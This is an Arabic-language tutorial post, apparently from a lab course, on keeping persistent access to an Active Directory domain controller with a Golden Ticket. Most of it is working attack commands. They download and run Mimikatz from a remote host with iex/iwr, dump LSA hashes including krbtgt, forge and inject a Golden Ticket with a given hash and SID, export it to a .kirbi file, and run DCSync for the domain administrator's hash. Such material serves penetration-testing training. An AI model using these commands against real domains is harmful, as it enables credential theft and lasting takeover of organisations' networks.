Persistence - Golden Ticket
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في المقالة السابقة وصلنا الى جهاز Domain Controller طبعا جهاز ال Domain Controller هو الجهاز المتحكم في كل شي في ال Active Directory لكن كيف راح نثبت اختراقنا بحيث ف اي وقت اقدر ارجع وادخل الى هذا الجهاز بصلاحية مستخدم محدود
الشرح:
اول شي راح نسوي Load ل اداة Mimikatz على جهاز Domain Controller ونسحب لجميع الهاشات الموجودة لكن الهاش اللي يهمنا اللي هو الهاش الخاص بالمستخدم krbtgt
راح نسوي Load عن طريق هذا الامر:
iex (iwr http://172.16.100.7/Invoke-Mimikatz.ps1 -UseBasicParsing)
بعد كذا ننفذ هذا الامر:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::lsa /patch"'
طيب الان راح ننفذ تكنيك Golden Ticket طبعا هذا التكنيك له متطلبات:
1- الـNTLM Hash الخاص في المتسخدم krbtgt
2- اسم الـDomain
3- الـSID الخاص في الدومين
فقط اللي ناقصنا من المتطلبات اسم ال Domain و ال SID الخاص في الدومين
راح نقدر نتسخرج اسم الـDomain عن طريق اداة PowerView عن طريق هذا الامر:
Get-NetDomain
والـSid الخاص بالدومين راح نستخرجه عن طريق هذا الامر:
Get-DomainSID
الان جمعنا المتطلبات كل اللي علينا نفتح جلسة PowerShell ونشغل اداة Mimikatz وننفذ هذا الامر:
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /sid:S-1-5-21-1874506631-3219952063-538504511 /ptt
الان ننفذ الامر klist عشان نشوف هل فعلا انحقنت الـTicket او لا
زي مانلاحظ انه انحقن الـTicket وراح يكون صالح الى سنة 2032 :)
طبعا نفترض لو انه بالغلط قفلنا صفحة البورشيل واستخدمنا وحده جديدة هل راح تروح الـTicket ؟
لا
طيب لو بستخدم هذي التيكت في جهاز ثاني هل راح اروح انفذ نفس الامر؟
اي بس في طريقة انه تخلي اداة ال Mimikatz تعطيك ال Ticket في ملف عن طريق هذا الامر:
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /sid:S-1-5-21-1874506631-3219952063-538504511 /ticket:C:\Users\student407\Desktop\goldTick.kirbi
الان الـTicket انحفظت في ملف الان اقدر انقل الملف الى اي جهاز واحقن هذا الملف عن طريق اداة Mimikatz
راح نحقن ملف الـTicket عن طريق هذا الامر:
kerberos::ptt "C:\Users\student407\Desktop\goldTick.kirbi"
طيب ايش اقدر اسوي اللحين مدام انه عندي Golden Ticket؟
ممكن نتصفح ال Share Files الخاصة بالـDomain Controller او اي جهاز من الاجهزة مرتبط بالـDomain عن طريق هذا الامر:
dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
او ممكن ننفذ dcsync attack دام انه معنا Golde Ticket بس ايش هذا الـAttack؟
هذا الـAttack فكرته انه ممكن تستخرج NTLM HASH لي اي مستخدم موجود على الدومين طبعا راح ننفذه عن طريق اداة Mimikatz
راح اجرب استخرج NTLM hash الخاص بالـDomain Administrator عن طريق هذا الامر
lsadump::dcsync /user:dcorp\Administrator
وبعد كذا ممكن ننفذ تكنينك Pass The Hash عشان نسجل دخول بالـDomain Administrator وانا شرحت هذا التكنيك في المقالة السابقة ياليت ترجع تشوف التكنيك لو ماتعرفه
وبكذا وصلنا الى نهاية المقالة
اتمنى نالت على اعجابكم 3>
شاكر لكم.
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !